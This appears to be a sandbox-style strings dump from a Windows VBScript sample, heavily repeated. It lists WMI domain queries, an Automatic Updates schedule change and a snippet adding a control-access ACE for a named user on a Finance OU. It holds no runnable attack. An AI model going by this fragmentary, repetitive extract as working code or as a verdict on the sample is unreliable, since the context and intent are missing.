    Echo

    DcSiteName

    Echo

    Description

    Echo

    DnsForestName

    Echo

    DomainControllerAddress

    Echo

    DomainControllerAddressType

    Echo

    DomainControllerName

    Echo

    DomainGuid

    Echo

    DomainName

    Echo

    DSDirectoryServiceFlag

    Echo

    DSDnsControllerFlag

    Echo

    DSDnsDomainFlag

    Echo

    DSDnsForestFlag

    Echo

    DSGlobalCatalogFlag

    Echo

    DSKerberosDistributionCenterFlag

    Echo

    DSPrimaryDomainControllerFlag

    Echo

    DSTimeServiceFlag

    Echo

    DSWritableFlag

    Echo

    Name

    Echo

    PrimaryOwnerContact

    Echo

    GetObject

    Get

    DiscretionaryAcl

    CreateObject

    Trustee

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    ObjectType

    InheritedObjectType

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    AddAce

    DiscretionaryAcl

    Put

    Array

    SetInfo

    GetObject

    ExecQuery

    Echo

    DC

    Echo

    Default

    Echo

    Domain

    Echo

    KeyName

    Echo

    Maps

    Echo

    CreateObject

    Settings

    ScheduledInstallationDay

    ScheduledInstallationTime

    Save

    GetObject

    ExecQuery

    Echo

    ClientSiteName

    Echo

    DcSiteName

    Echo

    Description

    Echo

    DnsForestName

    Echo

    DomainControllerAddress

    Echo

    DomainControllerAddressType

    Echo

    DomainControllerName

    Echo

    DomainGuid

    Echo

    DomainName

    Echo

    DSDirectoryServiceFlag

    Echo

    DSDnsControllerFlag

    Echo

    DSDnsDomainFlag

    Echo

    DSDnsForestFlag

    Echo

    DSGlobalCatalogFlag

    Echo

    DSKerberosDistributionCenterFlag

    Echo

    DSPrimaryDomainControllerFlag

    Echo

    DSTimeServiceFlag

    Echo

    DSWritableFlag

    Echo

    Name

    Echo

    PrimaryOwnerContact

    Echo

    GetObject

    Get

    DiscretionaryAcl

    CreateObject

    Trustee

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    ObjectType

    InheritedObjectType

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    AddAce

    DiscretionaryAcl

    Put

    Array

    SetInfo

    GetObject

    ExecQuery

    Echo

    DC

    Echo

    Default

    Echo

    Domain

    Echo

    KeyName

    Echo

    Maps

    Echo

    CreateObject

    Settings

    ScheduledInstallationDay

    ScheduledInstallationTime

    Save

    GetObject

    ExecQuery

    Echo

    ClientSiteName

    Echo

    DcSiteName

    Echo

    Description

    Echo

    DnsForestName

    Echo

    DomainControllerAddress

    Echo

    DomainControllerAddressType

    Echo

    DomainControllerName

    Echo

    DomainGuid

    Echo

    DomainName

    Echo

    DSDirectoryServiceFlag

    Echo

    DSDnsControllerFlag

    Echo

    DSDnsDomainFlag

    Echo

    DSDnsForestFlag

    Echo

    DSGlobalCatalogFlag

    Echo

    DSKerberosDistributionCenterFlag

    Echo

    DSPrimaryDomainControllerFlag

    Echo

    DSTimeServiceFlag

    Echo

    DSWritableFlag

    Echo

    Name

    Echo

    PrimaryOwnerContact

    Echo

    GetObject

    Get

    DiscretionaryAcl

    CreateObject

    Trustee

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    ObjectType

    InheritedObjectType

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    AddAce

    DiscretionaryAcl

    Put

    Array

    SetInfo

    GetObject

    ExecQuery

    Echo

    DC

    Echo

    Default

    Echo

    Domain

    Echo

    KeyName

    Echo

    Maps

    Echo

    CreateObject

    Settings

    ScheduledInstallationDay

    ScheduledInstallationTime

    Save

    GetObject

    ExecQuery

    Echo

    ClientSiteName

    Echo

    DcSiteName

    Echo

    Description

    Echo

    DnsForestName

    Echo

    DomainControllerAddress

    Echo

    DomainControllerAddressType

    Echo

    DomainControllerName

    Echo

    DomainGuid

    Echo

    DomainName

    Echo

    DSDirectoryServiceFlag

    Echo

    DSDnsControllerFlag

    Echo

    DSDnsDomainFlag

    Echo

    DSDnsForestFlag

    Echo

    DSGlobalCatalogFlag

    Echo

    DSKerberosDistributionCenterFlag

    Echo

    DSPrimaryDomainControllerFlag

    Echo

    DSTimeServiceFlag

    Echo

    DSWritableFlag

    Echo

    Name

    Echo

    PrimaryOwnerContact

    Echo

    GetObject

    Get

    DiscretionaryAcl

    CreateObject

    Trustee

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    ObjectType

    InheritedObjectType

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    AddAce

    DiscretionaryAcl

    Put

    Array

    SetInfo

    GetObject

    ExecQuery

    Echo

    DC

    Echo

    Default

    Echo

    Domain

    Echo

    KeyName

    Echo

    Maps

    Echo

    CreateObject

    Settings

    ScheduledInstallationDay

    ScheduledInstallationTime

    Save

    GetObject

    ExecQuery

    Echo

    ClientSiteName

    Echo

    DcSiteName

    Echo

    Description

    Echo

    DnsForestName

    Echo

    DomainControllerAddress

    Echo

    DomainControllerAddressType

    Echo

    DomainControllerName

    Echo

    DomainGuid

    Echo

    DomainName

    Echo

    DSDirectoryServiceFlag

    Echo

    DSDnsControllerFlag

    Echo

    DSDnsDomainFlag

    Echo

    DSDnsForestFlag

    Echo

    DSGlobalCatalogFlag

    Echo

    DSKerberosDistributionCenterFlag

    Echo

    DSPrimaryDomainControllerFlag

    Echo

    DSTimeServiceFlag

    Echo

    DSWritableFlag

    Echo

    Name

    Echo

    PrimaryOwnerContact

    Echo

    GetObject

    Get

    DiscretionaryAcl

    CreateObject

    Trustee

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    ObjectType

    InheritedObjectType

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    AddAce

    DiscretionaryAcl

    Put

    Array

    SetInfo

    GetObject

    ExecQuery

    Echo

    DC

    Echo

    Default

    Echo

    Domain

    Echo

    KeyName

    Echo

    Maps

    Echo

    CreateObject

    Settings

    ScheduledInstallationDay

    ScheduledInstallationTime

    Save

    GetObject

    ExecQuery

    Echo

    ClientSiteName

    Echo

    DcSiteName

    Echo

    Description

    Echo

    DnsForestName

    Echo

    DomainControllerAddress

    Echo

    DomainControllerAddressType

    Echo

    DomainControllerName

    Echo

    DomainGuid

    Echo

    DomainName

    Echo

    DSDirectoryServiceFlag

    Echo

    DSDnsControllerFlag

    Echo

    DSDnsDomainFlag

    Echo

    DSDnsForestFlag

    Echo

    DSGlobalCatalogFlag

    Echo

    DSKerberosDistributionCenterFlag

    Echo

    DSPrimaryDomainControllerFlag

    Echo

    DSTimeServiceFlag

    Echo

    DSWritableFlag

    Echo

    Name

    Echo

    PrimaryOwnerContact

    Echo

    GetObject

    Get

    DiscretionaryAcl

    CreateObject

    Trustee

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    ObjectType

    InheritedObjectType

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    AddAce

    DiscretionaryAcl

    Put

    Array

    SetInfo

    GetObject

    ExecQuery

    Echo

    DC

    Echo

    Default

    Echo

    Domain

    Echo

    KeyName

    Echo

    Maps

    Echo

    CreateObject

    Settings

    ScheduledInstallationDay

    ScheduledInstallationTime

    Save

    GetObject

    ExecQuery

    Echo

    ClientSiteName

    Echo

    DcSiteName

    Echo

    Description

    Echo

    DnsForestName

    Echo

    DomainControllerAddress

    Echo

    DomainControllerAddressType

    Echo

    DomainControllerName

    Echo

    DomainGuid

    Echo

    DomainName

    Echo

    DSDirectoryServiceFlag

    Echo

    DSDnsControllerFlag

    Echo

    DSDnsDomainFlag

    Echo

    DSDnsForestFlag

    Echo

    DSGlobalCatalogFlag

    Echo

    DSKerberosDistributionCenterFlag

    Echo

    DSPrimaryDomainControllerFlag

    Echo

    DSTimeServiceFlag

    Echo

    DSWritableFlag

    Echo

    Name

    Echo

    PrimaryOwnerContact

    Echo

    GetObject

    Get

    DiscretionaryAcl

    CreateObject

    Trustee

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    ObjectType

    InheritedObjectType

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    AddAce

    DiscretionaryAcl

    Put

    Array

    SetInfo

    GetObject

    ExecQuery

    Echo

    DC

    Echo

    Default

    Echo

    Domain

    Echo

    KeyName

    Echo

    Maps

    Echo

    CreateObject

    Settings

    ScheduledInstallationDay

    ScheduledInstallationTime

    Save

    GetObject

    ExecQuery

    Echo

    ClientSiteName

    Echo

    DcSiteName

    Echo

    Description

    Echo

    DnsForestName

    Echo

    DomainControllerAddress

    Echo

    DomainControllerAddressType

    Echo

    DomainControllerName

    Echo

    DomainGuid

    Echo

    DomainName

    Echo

    DSDirectoryServiceFlag

    Echo

    DSDnsControllerFlag

    Echo

    DSDnsDomainFlag

    Echo

    DSDnsForestFlag

    Echo

    DSGlobalCatalogFlag

    Echo

    DSKerberosDistributionCenterFlag

    Echo

    DSPrimaryDomainControllerFlag

    Echo

    DSTimeServiceFlag

    Echo

    DSWritableFlag

    Echo

    Name

    Echo

    PrimaryOwnerContact

    Echo

    GetObject

    Get

    DiscretionaryAcl

    CreateObject

    Trustee

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    ObjectType

    InheritedObjectType

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    AddAce

    DiscretionaryAcl

    Put

    Array

    SetInfo

    GetObject

    ExecQuery

    Echo

    DC

    Echo

    Default

    Echo

    Domain

    Echo

    KeyName

    Echo

    Maps

    Echo

    CreateObject

    Settings

    ScheduledInstallationDay

    ScheduledInstallationTime

    Save

    GetObject

    ExecQuery

    Echo

    ClientSiteName

    Echo

    DcSiteName

    Echo

    Description

    Echo

    DnsForestName

    Echo

    DomainControllerAddress

    Echo

    DomainControllerAddressType

    Echo

    DomainControllerName

    Echo

    DomainGuid

    Echo

    DomainName

    Echo

    DSDirectoryServiceFlag

    Echo

    DSDnsControllerFlag

    Echo

    DSDnsDomainFlag

    Echo

    DSDnsForestFlag

    Echo

    DSGlobalCatalogFlag

    Echo

    DSKerberosDistributionCenterFlag

    Echo

    DSPrimaryDomainControllerFlag

    Echo

    DSTimeServiceFlag

    Echo

    DSWritableFlag

    Echo

    Name

    Echo

    PrimaryOwnerContact

    Echo

    GetObject

    Get

    DiscretionaryAcl

    CreateObject

    Trustee

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    ObjectType

    InheritedObjectType

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    AddAce

    DiscretionaryAcl

    Put

    Array

    SetInfo

    GetObject

    ExecQuery

    Echo

    DC

    Echo

    Default

    Echo

    Domain

    Echo

    KeyName

    Echo

    Maps

    Echo

    CreateObject

    Settings

    ScheduledInstallationDay

    ScheduledInstallationTime

    Save

    GetObject

    ExecQuery

    Echo

    ClientSiteName

    Echo

    DcSiteName

    Echo

    Description

    Echo

    DnsForestName

    Echo

    DomainControllerAddress

    Echo

    DomainControllerAddressType

    Echo

    DomainControllerName

    Echo

    DomainGuid

    Echo

    DomainName

    Echo

    DSDirectoryServiceFlag

    Echo

    DSDnsControllerFlag

    Echo

    DSDnsDomainFlag

    Echo

    DSDnsForestFlag

    Echo

    DSGlobalCatalogFlag

    Echo

    DSKerberosDistributionCenterFlag

    Echo

    DSPrimaryDomainControllerFlag

    Echo

    DSTimeServiceFlag

    Echo

    DSWritableFlag

    Echo

    Name

    Echo

    PrimaryOwnerContact

    Echo

    GetObject

    Get

    DiscretionaryAcl

    CreateObject

    Trustee

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    ObjectType

    InheritedObjectType

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    AddAce

    DiscretionaryAcl

    Put

    Array

    SetInfo

    GetObject

    ExecQuery

    Echo

    DC

    Echo

    Default

    Echo

    Domain

    Echo

    KeyName

    Echo

    Maps

    Echo

    CreateObject

    Settings

    ScheduledInstallationDay

    ScheduledInstallationTime

    Save

    GetObject

    ExecQuery

    Echo

    ClientSiteName

    Echo

    DcSiteName

    Echo

    Description

    Echo

    DnsForestName

    Echo

    DomainControllerAddress

    Echo

    DomainControllerAddressType

    Echo

    DomainControllerName

    Echo

    DomainGuid

    Echo

    DomainName

    Echo

    DSDirectoryServiceFlag

    Echo

    DSDnsControllerFlag

    Echo

    DSDnsDomainFlag

    Echo

    DSDnsForestFlag

    Echo

    DSGlobalCatalogFlag

    Echo

    DSKerberosDistributionCenterFlag

    Echo

    DSPrimaryDomainControllerFlag

    Echo

    DSTimeServiceFlag

    Echo

    DSWritableFlag

    Echo

    Name

    Echo

    PrimaryOwnerContact

    Echo

    GetObject

    Get

    DiscretionaryAcl

    CreateObject

    Trustee

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    ObjectType

    InheritedObjectType

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    AddAce

    DiscretionaryAcl

    Put

    Array

    SetInfo

    GetObject

    ExecQuery

    Echo

    DC

    Echo

    Default

    Echo

    Domain

    Echo

    KeyName

    Echo

    Maps

    Echo

    CreateObject

    Settings

    ScheduledInstallationDay

    ScheduledInstallationTime

    Save

    GetObject

    ExecQuery

    Echo

    ClientSiteName

    Echo

    DcSiteName

    Echo

    Description

    Echo

    DnsForestName

    Echo

    DomainControllerAddress

    Echo

    DomainControllerAddressType

    Echo

    DomainControllerName

    Echo

    DomainGuid

    Echo

    DomainName

    Echo

    DSDirectoryServiceFlag

    Echo

    DSDnsControllerFlag

    Echo

    DSDnsDomainFlag

    Echo

    DSDnsForestFlag

    Echo

    DSGlobalCatalogFlag

    Echo

    DSKerberosDistributionCenterFlag

    Echo

    DSPrimaryDomainControllerFlag

    Echo

    DSTimeServiceFlag

    Echo

    DSWritableFlag

    Echo

    Name

    Echo

    PrimaryOwnerContact

    Echo

    GetObject

    Get

    DiscretionaryAcl

    CreateObject

    Trustee

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    ObjectType

    InheritedObjectType

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    AddAce

    DiscretionaryAcl

    Put

    Array

    SetInfo

    GetObject

    ExecQuery

    Echo

    DC

    Echo

    Default

    Echo

    Domain

    Echo

    KeyName

    Echo

    Maps

    Echo

    CreateObject

    Settings

    ScheduledInstallationDay

    ScheduledInstallationTime

    Save

    GetObject

    ExecQuery

    Echo

    ClientSiteName

    Echo

    DcSiteName

    Echo

    Description

    Echo

    DnsForestName

    Echo

    DomainControllerAddress

    Echo

    DomainControllerAddressType

    Echo

    DomainControllerName

    Echo

    DomainGuid

    Echo

    DomainName

    Echo

    DSDirectoryServiceFlag

    Echo

    DSDnsControllerFlag

    Echo

    DSDnsDomainFlag

    Echo

    DSDnsForestFlag

    Echo

    DSGlobalCatalogFlag

    Echo

    DSKerberosDistributionCenterFlag

    Echo

    DSPrimaryDomainControllerFlag

    Echo

    DSTimeServiceFlag

    Echo

    DSWritableFlag

    Echo

    Name

    Echo

    PrimaryOwnerContact

    Echo

    GetObject

    Get

    DiscretionaryAcl

    CreateObject

    Trustee

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    ObjectType

    InheritedObjectType

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    AddAce

    DiscretionaryAcl

    Put

    Array

    SetInfo

    GetObject

    ExecQuery

    Echo

    DC

    Echo

    Default

    Echo

    Domain

    Echo

    KeyName

    Echo

    Maps

    Echo

    CreateObject

    Settings

    ScheduledInstallationDay

    ScheduledInstallationTime

    Save

    GetObject

    ExecQuery

    Echo

    ClientSiteName

    Echo

    DcSiteName

    Echo

    Description

    Echo

    DnsForestName

    Echo

    DomainControllerAddress

    Echo

    DomainControllerAddressType

    Echo

    DomainControllerName

    Echo

    DomainGuid

    Echo

    DomainName

    Echo

    DSDirectoryServiceFlag

    Echo

    DSDnsControllerFlag

    Echo

    DSDnsDomainFlag

    Echo

    DSDnsForestFlag

    Echo

    DSGlobalCatalogFlag

    Echo

    DSKerberosDistributionCenterFlag

    Echo

    DSPrimaryDomainControllerFlag

    Echo

    DSTimeServiceFlag

    Echo

    DSWritableFlag

    Echo

    Name

    Echo

    PrimaryOwnerContact

    Echo

    StringsDecrypted Strings
    "LDAP://OU=Finance, DC=fabrikam,DC=Com"
    "ntSecurityDescriptor"
    "AccessControlEntry"
    "FABRIKAM\kmyer"
    "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"
    "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"
    "ntSecurityDescriptor"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from SFU_Domain"
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "Microsoft.Update.AutoUpdate"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from Win32_NTDomain"
    "Client Site Name: "
    "DC Site Name: "
    "DNS Forest Name: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Directory Service Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Description: "
    "Domain Controller Address Type: "
    "Domain Controller Address: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "Name: "
    "Primary Owner Contact: "
    "Client Site Name: "
    "DC Site Name: "
    "Description: "
    "DNS Forest Name: "
    "Domain Controller Address: "
    "Domain Controller Address Type: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "DS Directory Service Flag: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Name: "
    "Primary Owner Contact: "
    "LDAP://OU=Finance, DC=fabrikam,DC=Com"
    "ntSecurityDescriptor"
    "AccessControlEntry"
    "FABRIKAM\kmyer"
    "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"
    "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"
    "ntSecurityDescriptor"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from SFU_Domain"
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "Microsoft.Update.AutoUpdate"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from Win32_NTDomain"
    "Client Site Name: "
    "DC Site Name: "
    "DNS Forest Name: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Directory Service Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Description: "
    "Domain Controller Address Type: "
    "Domain Controller Address: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "Name: "
    "Primary Owner Contact: "
    "Client Site Name: "
    "DC Site Name: "
    "Description: "
    "DNS Forest Name: "
    "Domain Controller Address: "
    "Domain Controller Address Type: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "DS Directory Service Flag: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Name: "
    "Primary Owner Contact: "
    "LDAP://OU=Finance, DC=fabrikam,DC=Com"
    "ntSecurityDescriptor"
    "AccessControlEntry"
    "FABRIKAM\kmyer"
    "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"
    "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"
    "ntSecurityDescriptor"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from SFU_Domain"
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "Microsoft.Update.AutoUpdate"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from Win32_NTDomain"
    "Client Site Name: "
    "DC Site Name: "
    "DNS Forest Name: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Directory Service Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Description: "
    "Domain Controller Address Type: "
    "Domain Controller Address: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "Name: "
    "Primary Owner Contact: "
    "Client Site Name: "
    "DC Site Name: "
    "Description: "
    "DNS Forest Name: "
    "Domain Controller Address: "
    "Domain Controller Address Type: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "DS Directory Service Flag: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Name: "
    "Primary Owner Contact: "
    "LDAP://OU=Finance, DC=fabrikam,DC=Com"
    "ntSecurityDescriptor"
    "AccessControlEntry"
    "FABRIKAM\kmyer"
    "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"
    "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"
    "ntSecurityDescriptor"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from SFU_Domain"
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "Microsoft.Update.AutoUpdate"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from Win32_NTDomain"
    "Client Site Name: "
    "DC Site Name: "
    "DNS Forest Name: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Directory Service Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Description: "
    "Domain Controller Address Type: "
    "Domain Controller Address: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "Name: "
    "Primary Owner Contact: "
    "Client Site Name: "
    "DC Site Name: "
    "Description: "
    "DNS Forest Name: "
    "Domain Controller Address: "
    "Domain Controller Address Type: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "DS Directory Service Flag: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Name: "
    "Primary Owner Contact: "
    "LDAP://OU=Finance, DC=fabrikam,DC=Com"
    "ntSecurityDescriptor"
    "AccessControlEntry"
    "FABRIKAM\kmyer"
    "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"
    "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"
    "ntSecurityDescriptor"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from SFU_Domain"
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "Microsoft.Update.AutoUpdate"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from Win32_NTDomain"
    "Client Site Name: "
    "DC Site Name: "
    "DNS Forest Name: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Directory Service Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Description: "
    "Domain Controller Address Type: "
    "Domain Controller Address: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "Name: "
    "Primary Owner Contact: "
    "Client Site Name: "
    "DC Site Name: "
    "Description: "
    "DNS Forest Name: "
    "Domain Controller Address: "
    "Domain Controller Address Type: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "DS Directory Service Flag: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Name: "
    "Primary Owner Contact: "
    "LDAP://OU=Finance, DC=fabrikam,DC=Com"
    "ntSecurityDescriptor"
    "AccessControlEntry"
    "FABRIKAM\kmyer"
    "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"
    "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"
    "ntSecurityDescriptor"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from SFU_Domain"
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "Microsoft.Update.AutoUpdate"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from Win32_NTDomain"
    "Client Site Name: "
    "DC Site Name: "
    "DNS Forest Name: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Directory Service Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Description: "
    "Domain Controller Address Type: "
    "Domain Controller Address: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "Name: "
    "Primary Owner Contact: "
    "Client Site Name: "
    "DC Site Name: "
    "Description: "
    "DNS Forest Name: "
    "Domain Controller Address: "
    "Domain Controller Address Type: "
    "Domain Controller Name: "
    "Domain GUID: "
    "Domain Name: "
    "DS Directory Service Flag: "
    "DS DNS Controller Flag: "
    "DS DNS Domain Flag: "
    "DS DNS Forest Flag: "
    "DS Global Catalog Flag: "
    "DS Kerberos Distribution Center Flag: "
    "DS Primary Domain Controller Flag: "
    "DS Time Service Flag: "
    "DS Writable Flag: "
    "Name: "
    "Primary Owner Contact: "
    "LDAP://OU=Finance, DC=fabrikam,DC=Com"
    "ntSecurityDescriptor"
    "AccessControlEntry"
    "FABRIKAM\kmyer"
    "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"
    "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"
    "ntSecurityDescriptor"
    "."
    "winmgmts:""{impersonationLevel=impersonate}!\\"
    "Select * from SFU_Domain"
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
    "DC: "
    "Default: "
    "Domain: "
    "Key Name: "
    "Maps: "
